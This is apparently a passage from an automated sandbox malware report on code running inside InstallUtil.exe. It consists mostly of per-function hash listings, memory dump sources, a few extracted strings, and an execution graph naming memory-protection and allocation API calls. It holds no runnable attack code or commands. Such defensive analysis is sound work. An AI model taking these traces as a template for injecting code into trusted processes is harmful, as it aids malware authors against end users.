                          • Opcode Fuzzy Hash: 53ab9892634802b65096d31b4d57ddd1849a3cc07cb800c7349d540fb4a2f479
                          • Instruction Fuzzy Hash: 3321A2357006228BDB299A69D4A492FB7B6BF88651B15456AE906CF368DF30DC02CBC0
                          Function 0120D044 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4520041759.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_120d000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d0d08dca88e68d2fda5bacf75d2f2780ae4a9251a04dd2de865ddf70776e65a4
                          • Instruction ID: bd4436ad5926f6072d48984a3764af07a4704d4c208e2b6dccc4170fe887d563
                          • Opcode Fuzzy Hash: d0d08dca88e68d2fda5bacf75d2f2780ae4a9251a04dd2de865ddf70776e65a4
                          • Instruction Fuzzy Hash: A0213475514208DFCB12CFA8C9C0B26BB66FB84314F20CA6DE90D0B287C77BD846CA61
                          Function 014D215C Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ce4308ac7032d3c1635e3d4a4311ade8574de6b7c71d9421fc5f053afca16ad
                          • Instruction ID: cbaa147902f3bf8dea3c695a34f92f3e8439e2b492d3c1b9360b05fc9fd46c53
                          • Opcode Fuzzy Hash: 3ce4308ac7032d3c1635e3d4a4311ade8574de6b7c71d9421fc5f053afca16ad
                          • Instruction Fuzzy Hash: 98113B35E043599BCF029BB89C10CDEBB34FF89310B258757D66677061EA711945C791
                          Function 068596F0 Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0798977519476bcfb40d34f7f4ffd2a8b42173857df3c4ae1acd932a092315da
                          • Instruction ID: d8c8abcd7ce85d148f9868abe39d3d810acf04aadd4256b48020bea201604df2
                          • Opcode Fuzzy Hash: 0798977519476bcfb40d34f7f4ffd2a8b42173857df3c4ae1acd932a092315da
                          • Instruction Fuzzy Hash: EC115B767042545FCF8A5FBC48141AE3EA3EFC9250B40446FE505D7381DF348D4183A6
                          Function 014D4DC1 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e0a029d419014b0caa865040a94c2c1bf4d6cb1648a370a1a63450da60c61320
                          • Instruction ID: a85a19838d8a57b19c3d684bbc1047d22b75a387824d0ff3b7cc1bed7f8e1419
                          • Opcode Fuzzy Hash: e0a029d419014b0caa865040a94c2c1bf4d6cb1648a370a1a63450da60c61320
                          • Instruction Fuzzy Hash: A9210A717482169FDF15AF68D464B5B7BA2FB88320F14452AF5098B394CB34DD51CBE0
                          Function 014DD61F Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95ab5e2f78f4e91297c6d29743cf9105983bb553f77ce442f9b8957221bc7f8c
                          • Instruction ID: 869b5ac28c99e23825e52d9c2f3ec5e1b89bfb49c638228006d16a9a4892a7dc
                          • Opcode Fuzzy Hash: 95ab5e2f78f4e91297c6d29743cf9105983bb553f77ce442f9b8957221bc7f8c
                          • Instruction Fuzzy Hash: F8116D71D002488BDF09DFAAD8586DEBBB2AFCD301F08D126D418B72A9DB3448468F60
                          Function 0685E0C0 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6aaba36bb5f2629337f3e6aba15c371dd1400faf6646ae43be200498e30d42c
                          • Instruction ID: 90563c5118749c0c18fe1bbd683866c49fbf48b06ef22304ed3cce6dba3c1252
                          • Opcode Fuzzy Hash: d6aaba36bb5f2629337f3e6aba15c371dd1400faf6646ae43be200498e30d42c
                          • Instruction Fuzzy Hash: 981108357042548FD7051B7A9C1856BBFABAFCA211B558477E946C7386CE24CC468370
                          Function 014DE208 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2bfc0692509ee3bac8a3759cacac903fc86a32bdf8d5f1b816dc1c13ef9ba043
                          • Instruction ID: 079b78d7aee01d116c8015c3045a358e3c83dd20bffa0a5495eae975d8e276d5
                          • Opcode Fuzzy Hash: 2bfc0692509ee3bac8a3759cacac903fc86a32bdf8d5f1b816dc1c13ef9ba043
                          • Instruction Fuzzy Hash: A8216AB4D0010A8FDB45EFB9D54469EBFB2FF45304F10D6AAD108AB369EB345A45CB81
                          Function 014D1F61 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52592c81cc3afdb30eb3c4fb90d2db8b88dc808c1ba3c708205b9b6525251a9e
                          • Instruction ID: 15c98e06785c154b498714ac9c1eeebc164439cf3de4f0d400c0e7e42425054a
                          • Opcode Fuzzy Hash: 52592c81cc3afdb30eb3c4fb90d2db8b88dc808c1ba3c708205b9b6525251a9e
                          • Instruction Fuzzy Hash: E421CEB4D0520A8FCB41EFA8D9559EEBFF1BB49301F10466AD909F3261EB301A55CFA1
                          Function 011FD4EB Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4519905388.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_11fd000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction ID: 3fff1a55ee871b77c3cc3c60603e8514bc9c71eb3aad75e5d1809f7a0bc0b8bc
                          • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction Fuzzy Hash: 04119D76504240CFDF16DF54D5C4B26BF71FB84324F2486ADD9090A266C33AD45ACBA2
                          Function 06859328 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b63431406279b0222e87f15e77ab9f6faac4f4ef71cc475c5817271ba2ff96
                          • Instruction ID: 083cc818944f785aff69d598acedf991cefe0b038ad1badc4b8ac9a8ba8be131
                          • Opcode Fuzzy Hash: 98b63431406279b0222e87f15e77ab9f6faac4f4ef71cc475c5817271ba2ff96
                          • Instruction Fuzzy Hash: 141167B6800349DFDB10CF99C844BDEBFF4EB48320F14841AEA14A7210C339A950DFA5
                          Function 06859999 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 891a1ca14f8c7c545f7468b21fdc558bc8ea58c2052130c9c6107d098e3326e1
                          • Instruction ID: 17fedb7adf97a373836f2decd45f5b04cd401ce8eb1ca9cf2d6f719c345ea07d
                          • Opcode Fuzzy Hash: 891a1ca14f8c7c545f7468b21fdc558bc8ea58c2052130c9c6107d098e3326e1
                          • Instruction Fuzzy Hash: 3B1134B6800349DFDB11CF99C845BDEBFF9EB48320F14841AEA18A7251C339A954DFA1
                          Function 014DE218 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8028a632682f85eec9ae42174052c9ed4cda6ae9857f53b7eb0702d3923be1e
                          • Instruction ID: f0f13504fffd5a8098bebbab5b7bd8c97e88f1b1db45e861e5436304329367a9
                          • Opcode Fuzzy Hash: f8028a632682f85eec9ae42174052c9ed4cda6ae9857f53b7eb0702d3923be1e
                          • Instruction Fuzzy Hash: DB116AB8D001099FCB45EFA9D544A9EBFF2FF44304F40C6AAD118AB369EB305A45CB81
                          Function 06858EC1 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de4a4b14e24945b2972803d9df460c6cd1c1444faa1a9b294eb8a42d6e22dcc4
                          • Instruction ID: 7302a4ea7c708c9b5413f63e290e9d5d14e63e6d2ccbbca97cf4a00906385d4a
                          • Opcode Fuzzy Hash: de4a4b14e24945b2972803d9df460c6cd1c1444faa1a9b294eb8a42d6e22dcc4
                          • Instruction Fuzzy Hash: 50113074F001598FDF00DFE8D850B9EBBB2AF48315F019055E908E7349E73099418F50
                          Function 0120D03F Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4520041759.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_120d000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                          • Instruction ID: f5d98d249131cb0a8c81ac59f0280c34f00d8741f61388d1ebeae9c7114204ff
                          • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                          • Instruction Fuzzy Hash: 9C11BB79504288CFDB12CF94D9C4B16FBA2FB84314F24C6A9D9494B697C33AD44ACB62
                          Function 06852670 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60f121b188897bea1b08ff02f8adca1293d1aaf6b096c51346a9505ed5d818cb
                          • Instruction ID: a4cce145573370d00e77233c5c141874ba9279f1aa19e32f9304fa83b36ae867
                          • Opcode Fuzzy Hash: 60f121b188897bea1b08ff02f8adca1293d1aaf6b096c51346a9505ed5d818cb
                          • Instruction Fuzzy Hash: C811AD75B002258FC790EF7DE458A6E7BF4EF8862170245BAE906DB315EB32DD058B90
                          Function 014D560F Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73d892c2ebf456d2a4495c4613cc8632409c878b2cde43f213d11c8ad2888430
                          • Instruction ID: a36bd73dcb2f79e2f931d40858912899b90f7a6c2223d26447220fc02ef2d100
                          • Opcode Fuzzy Hash: 73d892c2ebf456d2a4495c4613cc8632409c878b2cde43f213d11c8ad2888430
                          • Instruction Fuzzy Hash: 31019272B041156FDF059E55A820EAF3BB6DBC8651F18806AF919CB390DE718C12CB91
                          Function 068525E8 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 291b44331d639ad65501345fa3f2d39f039530276d7afa5a92a884961a60f34c
                          • Instruction ID: 683f59040daf9758c8e10663792ae91ed19c7823beb22c480aa58876de205443
                          • Opcode Fuzzy Hash: 291b44331d639ad65501345fa3f2d39f039530276d7afa5a92a884961a60f34c
                          • Instruction Fuzzy Hash: 9901B670E003199FCF44EFB9D951AEEBBF5AF48201F50856AD91AE7264EB345A01CB90
                          Function 06859760 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73571ed593ab9a9d4e1308852d046de779102a9d6663008222834e43f108ad0c
                          • Instruction ID: ddeccf5962fe0efe25906f2684164015fe6dbcf1b0553981eacc32e44a5439ae
                          • Opcode Fuzzy Hash: 73571ed593ab9a9d4e1308852d046de779102a9d6663008222834e43f108ad0c
                          • Instruction Fuzzy Hash: FFF089363002196F8F455E989C449EF7FABEBC8250B40442EFA19D7351DF714C1197A5
                          Function 014DD459 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc186e77f0d2f20bc2e9e98e22c6e0d54dfa5a3360adcb1a773d2c61020608d6
                          • Instruction ID: d32263dfa08a0347d15abfc72e1a38a5484c57460ee05bb7b9d519aac583e1fe
                          • Opcode Fuzzy Hash: bc186e77f0d2f20bc2e9e98e22c6e0d54dfa5a3360adcb1a773d2c61020608d6
                          • Instruction Fuzzy Hash: 89E06870D082089BCF029FF9F80C2FABB75DB86300F006135D204A32D6CBB09116CA91
                          Function 014DDF18 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fa9390651c382717428cc067b91d2c9d9e575ade1268d0b90153e11782b86c8
                          • Instruction ID: 029cbf4db5f5ce2265a8caed6589fdfac80002bb47dfeb0f37f9f819362d81e1
                          • Opcode Fuzzy Hash: 6fa9390651c382717428cc067b91d2c9d9e575ade1268d0b90153e11782b86c8
                          • Instruction Fuzzy Hash: B3E06832D04205DBCF049FA9F42D2FABBB4DBC6310F409475E200A21E2CBB481198A91
                          Function 014D2010 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28a04309158441fa7102665bc66dca847cebb93e200036deb06956d09e9fe045
                          • Instruction ID: e53cef20554c56f509a1e42bdde3a5d3303d0ceb158b71d4e2952bf658d1b2cd
                          • Opcode Fuzzy Hash: 28a04309158441fa7102665bc66dca847cebb93e200036deb06956d09e9fe045
                          • Instruction Fuzzy Hash: 44E0D83582439A9FCB019BA5DC004DEFB34EED3210B4545A7D024A7052EB70255DCBB1
                          Function 014DD4C4 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14fd956f378eea9aeb0f92b854189b16e203ff95ad2c54a87afe6585c88450ea
                          • Instruction ID: d1d5cb2c869e203a398a50149e53a45742ad9fc8ac9deea4a857c80dc4eb05e6
                          • Opcode Fuzzy Hash: 14fd956f378eea9aeb0f92b854189b16e203ff95ad2c54a87afe6585c88450ea
                          • Instruction Fuzzy Hash: A2E02692C09140CBEF118BEA68360F9BF30CDE324178461E7D149DB6B2D238E606DB11
                          Function 014D2020 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4cf82eaf0df9decd7338405e5475529924c424114af6439666125f2652f90c
                          • Instruction ID: 029bc0a622d6c8ecf8e7d7f29d452ea5785f4d4c389dded27e885aa293771617
                          • Opcode Fuzzy Hash: fd4cf82eaf0df9decd7338405e5475529924c424114af6439666125f2652f90c
                          • Instruction Fuzzy Hash: AFD05E32D2032B97CB00EBA5EC048EFFB38EED6261B958626D52437154FB702659C6E1
                          Function 014D8270 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                          • Instruction ID: 428c2e2f1bdcde26c88fd1fdfc886d49434c38efbf29866ce9dbfe6444fd735f
                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                          • Instruction Fuzzy Hash: FBC08C3320C5282EAA25108F7C45EB7BB8CE3C16B4A250137F51CC321098539C8102F4
                          Function 014DA71D Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 233ceac36a2711e835008521884c8ffe3bae86a1e2637f35b0299aa8ad11298e
                          • Instruction ID: 69f626b0fc8cca95884cea67ee71cc3d43182410c284a3fb6166da6df5f22c1e
                          • Opcode Fuzzy Hash: 233ceac36a2711e835008521884c8ffe3bae86a1e2637f35b0299aa8ad11298e
                          • Instruction Fuzzy Hash: 4ED0677BB510189FCB049F98E840CDDB7B6FB9C221B048556F925A3261C6319961DB60
                          Function 014D5EB0 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73e8287647a496fa4ee3f2a63032e349832b0532c2575164572fb0a153af691b
                          • Instruction ID: 1cacb90f933f2523886f7db2f2686794b21a4e03e5e17c0358454f88d485a563
                          • Opcode Fuzzy Hash: 73e8287647a496fa4ee3f2a63032e349832b0532c2575164572fb0a153af691b
                          • Instruction Fuzzy Hash: A8D02EB090834A4BC307F736E94040A3F39FF81208BD44AE4B8090A80BEE780C8887A2
                          Function 014DFBFB Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31ef1f040bb64fe0ed4c4f9bf006652001a8b2e8082cac46b431c8253be3958e
                          • Instruction ID: e0d02fca3af12f54a833d9e3b67586fe1ebae0ab85cfa07ddbbc2e7c1020fb23
                          • Opcode Fuzzy Hash: 31ef1f040bb64fe0ed4c4f9bf006652001a8b2e8082cac46b431c8253be3958e
                          • Instruction Fuzzy Hash: 15D06774D4411C8BCF20DF98DA546DCB7B0EF95300F0018D79809B2210D6305E658F11
                          Function 014D5EC0 Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e537dd1e15836ece80e4d488c65715ce57dba699eb5d6fb41e18284fdc6fd8c3
                          • Instruction ID: 78c58ec7626af8ff4a9c91aedaf39cd6bd2b1c825ebd831e63118d6c82f5d242
                          • Opcode Fuzzy Hash: e537dd1e15836ece80e4d488c65715ce57dba699eb5d6fb41e18284fdc6fd8c3
                          • Instruction Fuzzy Hash: 4BC012B091470E47C547F776E9459163B6EFBC0204F904B50B11E0651ADE7418848690

                          Non-executed Functions

                          Function 06852807 Relevance: 14.1, Strings: 11, Instructions: 388COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4538816431.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6850000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$0olp$Hiq$PHeq$PHeq$PHeq$PHeq$PHeq$PHeq$PHeq$PHeq
                          • API String ID: 0-1117033037
                          • Opcode ID: e857e1d887b787b701f724ce9281c53a71e454f844dd59cc2fd33ca0234d8d5e
                          • Instruction ID: 0f51b5aa29522ab4651df9bf872b4aaaca099ac7e5921fd9db3655449a56abfd
                          • Opcode Fuzzy Hash: e857e1d887b787b701f724ce9281c53a71e454f844dd59cc2fd33ca0234d8d5e
                          • Instruction Fuzzy Hash: 4912D2B4E002188FDB58DF69D954BDDBBB2BF89300F2081A9D909AB355DB359E81CF50
                          Function 014D21E2 Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: Xiq$Xiq$Xiq$Xiq
                          • API String ID: 0-4026295062
                          • Opcode ID: 3d92d610578355354a45dfe376f5dd058943ad18db296ba70928271bf37b3f66
                          • Instruction ID: 62dfffa4b2a68b11b655ebd4ebf6d1fea4faa5be8bd47dc4f80ac9b9589697f8
                          • Opcode Fuzzy Hash: 3d92d610578355354a45dfe376f5dd058943ad18db296ba70928271bf37b3f66
                          • Instruction Fuzzy Hash: F451C870E042198FDF659F6888647BF7BB2FF84300F14456AD50997365DB708E85CB92
                          Function 014D60A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: \;eq$\;eq$\;eq$\;eq
                          • API String ID: 0-3455962030
                          • Opcode ID: c863372a66e8d4baa5a0982b9372542ea1adf3592c3dcee3f3e75647bc6d98cc
                          • Instruction ID: 800cf949e72e32ee04eb82652a57132010993621c2f91ded16bfbfb642fac0fe
                          • Opcode Fuzzy Hash: c863372a66e8d4baa5a0982b9372542ea1adf3592c3dcee3f3e75647bc6d98cc
                          • Instruction Fuzzy Hash: BF0171717504148FCF56CE2DC56092B77F6AF88760716816BE501CB3B2EB71DC428B90

                          Execution Graph

                          Execution Coverage:12.6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:186
                          Total number of Limit Nodes:7
                          execution_graph 54780 5a914f8 54781 5a91547 NtProtectVirtualMemory 54780->54781 54783 5a915bf 54781->54783 54730 218d030 54731 218d048 54730->54731 54732 218d0a3 54731->54732 54734 5b6e1b8 54731->54734 54735 5b6e211 54734->54735 54738 5b6e748 54735->54738 54736 5b6e246 54739 5b6e775 54738->54739 54742 5b6e90b 54739->54742 54743 5b6d5f0 54739->54743 54742->54736 54744 5b6d617 54743->54744 54747 5b6dad0 54744->54747 54748 5b6db19 VirtualProtect 54747->54748 54750 5b6d6d4 54748->54750 54750->54736 54809 2218dc8 54810 2218de4 54809->54810 54811 2218df4 54810->54811 54815 5b612a4 54810->54815 54819 5b67c2c 54810->54819 54822 5b67b9f 54810->54822 54816 5b612c3 54815->54816 54818 5b6d5f0 VirtualProtect 54816->54818 54817 5b612ea 54818->54817 54821 5b6d5f0 VirtualProtect 54819->54821 54820 5b601e8 54821->54820 54823 5b67bbb 54822->54823 54825 5b6d5f0 VirtualProtect 54823->54825 54824 5b601e8 54825->54824 54751 5ae6d80 54752 5ae6d8a 54751->54752 54756 5aa9820 54752->54756 54761 5aa9810 54752->54761 54753 5ae6dc8 54757 5aa9835 54756->54757 54766 5aa9989 54757->54766 54771 5aa9a7f 54757->54771 54758 5aa984b 54758->54753 54762 5aa9820 54761->54762 54764 5aa9989 2 API calls 54762->54764 54765 5aa9a7f 2 API calls 54762->54765 54763 5aa984b 54763->54753 54764->54763 54765->54763 54767 5aa99ad 54766->54767 54768 5aa9ab9 54767->54768 54769 5a92d08 VirtualProtect 54767->54769 54770 5a92d00 VirtualProtect 54767->54770 54768->54758 54769->54767 54770->54767 54772 5aa9a85 54771->54772 54773 5aa9ab9 54772->54773 54774 5a92d08 VirtualProtect 54772->54774 54775 5a92d00 VirtualProtect 54772->54775 54773->54758 54774->54772 54775->54772 54776 5b6ec98 54777 5b6ecdc VirtualAlloc 54776->54777 54779 5b6ed49 54777->54779 54552 5ae74a1 54553 5ae74ab 54552->54553 54557 5a9b821 54553->54557 54562 5a9b830 54553->54562 54554 5ae74e9 54558 5a9b845 54557->54558 54559 5a9b85b 54558->54559 54567 5a9bb48 54558->54567 54572 5a9be06 